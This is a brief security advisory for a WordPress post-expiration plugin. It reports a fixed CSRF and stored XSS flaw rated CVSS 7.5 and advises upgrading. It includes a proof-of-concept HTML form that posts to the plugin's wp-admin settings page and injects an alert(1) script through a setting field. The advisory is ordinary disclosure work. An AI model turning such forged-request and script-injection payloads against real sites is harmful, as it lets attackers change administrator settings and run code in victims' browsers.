CVSS Summary
| Score | 7.5 High |
|---|---|
| Vector | Network |
| Complexity | Low |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | Partial |
Last revised:
A lack of output escaping and safe request processing allows CSRF and XSS.
Current state: Fixed
| Score | 7.5 High |
|---|---|
| Vector | Network |
| Complexity | Low |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | Partial |
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=post-expirator.php"> <input type="text" name="expired-default-date-format" value=""><script>alert(1)</script>"> <input type="text" name="expirationdateSave" value="kthxbai"> <input type="submit"> </form>
Upgrade immediately.